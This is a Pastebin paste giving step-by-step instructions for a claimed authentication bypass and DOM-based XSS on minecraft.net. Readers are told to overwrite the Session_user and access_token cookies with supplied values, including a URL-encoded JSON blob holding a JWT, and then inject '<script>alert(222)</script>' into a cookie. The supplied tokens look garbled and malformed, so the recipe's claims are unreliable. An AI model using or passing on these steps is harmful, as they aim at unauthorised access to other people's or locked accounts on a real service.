Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =========================================================================================================================
- Founded By N
- This Is Dom-Based XSS So {Client Side}
- Also A Bypass to Get ur Account Unlocked
- =========================================================================================================================
- To Preform This Vuln U Will Need a Minecraft Account Even One that is Blocked with sec answers
- Example: https://imgur.com/iKyP1GH
- Now Login to ur Mine-craft account it
- Now Open inspect Element Now go to Ur Cookie's and u should see ur *********@gmail.com Under Then Name Session_user
- Now Edit The Value Of The User and set it to this {0568tx6RNOWCRzu8OC9zIc37snwC08QkFkjTOH7-Wi4WS6_L560KgA==}
- This Cookie Was Generated By Magic-Cokkie's on Exploit DB
- Now Once That Has Changed To Bypass the auth U need To Do is find the cookie id that's named access_token=
- Then Edit the Value And This {{%22user%22:{%22id%22:%22810346e38c87024d03b433443bf51502f6&%22}%2C%22accessToken%22:%22eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI4MTA2ZTM4Yzg3MDI0ZDAzYmJmNTE1MDJmNmZhOWE5YyIsIm5iZiI6MTU3Mjg4NzM3NywieWdndCI6ImE2OGIzM2JiYzkzZjRlM2FhOGEwOTI1NTg3Y2Y4ZjFlIiwicm9sZXMiOltdLCJpc3M((&&bnRlcm5hbC1hdXRoZW50aWNhdGlvbiIsImV4cCI6MTU3MzA2MDE3NywiaWF0IjoxNTcyODg3Mzc3fQ.qdoLb2OyLvUsRvXweAb4XRoy4ARxXYsTagcKIKuvvSM%22%2C%22clientToken:[]}
- Now Reload the Page then it should bypass the Auth And Change ur username to that token One that has been Complete
- Edit the Value to the Session_User= to this {<script>alert(222)</script>} Then Click Skins then Relmes then Billing info
- then click Back to minecraft.net
- Once Preformed it should Have a XSS pop up like this
- EXAMPLE : https://imgur.com/a/f4Tghxz
- Boom XSS and ur Have Bypassed Auth
- This Vuln Has Been Set To Microsoft Founder Of This Vuln Is Nano
- @Copyright 2019 All Rights reserved
Add Comment
Please, Sign In to add comment